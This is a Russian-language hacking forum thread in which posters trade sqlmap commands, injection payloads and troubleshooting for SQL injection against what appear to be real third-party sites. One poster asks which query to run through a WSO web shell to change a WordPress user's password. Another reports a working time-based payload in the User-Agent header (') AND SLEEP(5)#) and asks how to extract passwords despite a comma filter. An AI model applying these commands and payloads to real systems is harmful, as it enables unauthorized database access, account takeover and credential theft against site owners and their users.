./sqlmap.py --headers="User-Agent: Mozilla/5.0 Gecko/20120101 Firefox/26.0" --cookie="%Query_Cookie%" -u 'http://url.com/path/?id=1' --level=5 risk=3 -p %Parametr% Или -r и путь к файлу с HTTP запросом PHP: POST /vuln.php HTTP/1.1 Host: www.target.com User-Agent: Mozilla/4.0 id=1
Ребят , какой запрос в wso shell сделать , чтобы поменять Пароль в mysql базе . Допустим wordpress password "user_pass"
sql инъекция Помогите пожалуйста когда делаю запрос через order by дает такой ответ A Database Error Occurred Error Number: 1054 Unknown column '3_order_by_80' in 'where clause' SELECT * FROM authors where id=3_order_by_80 limit 0,1 можно из бд что то вытащить?
откуда нижнее подчеркивание? почему limit? перечитайте статьи по sqli и пройдите хотя бы базовое введение в sql
нет, я набираю 3 order by 80-- а в ответ получаю A Database Error Occurred Error Number: 1054 Unknown column '3_order_by_80' in 'where clause' SELECT * FROM authors where id=3_order_by_80 limit 0,1
да, я набирал, но выдает ошибку An Error Was Encountered The URI you submitted has disallowed characters. И на коментарий и на плюс
Так можно долго гадать какой вариант сработает, и по сути получается один оффтоп, хотите увидеть результат, публикуйте ссылку.
Способ на первый взгляд сработал, вектор запросов найден, timebased SQL, я дошёл до финальной стадии когда SQLmap предлагает ввести произвольный SQL запрос и выполнить его, однако он не выполняется, на любой запрос выводит none Пробую способ: ./sqlmap.py --headers="User-Agent: Mozilla/5.0 Gecko/20120101 *" -u "http://url.com/path/?id=1" --level=5 risk=3 --dbms="MySQL" Вектор атаки найден: Payload: User-Agent: Mozilla/5.0 Gecko/20120101') AND SLEEP(5)# Однако, в SQL иньекции фильтруются запятые, а так как я не силен в timebased векторах, то даже предположить не могу, возможно ли провести timebased атаку без запятых и выполнить грубо говоря запрос select password from user После найденного вектора запускаю скрипт: ./sqlmap.py --headers="User-Agent: Mozilla/5.0 Gecko/20120101 *" -u "http://url.com/path/?id=1" --level=5 risk=3 --dbms="MySQL" --sql-query="SELECT user()" Он ждет минут 5-10 в retrieved:, пытается выполнить запрос и вытащить ответ, и по истечению времени вываливает: SELECT user(): None И так на любой SQL запрос. И вот вопрос, это из за запятых невозможно провести атаку, или я что то не так делаю? Подскажите пожалуйста!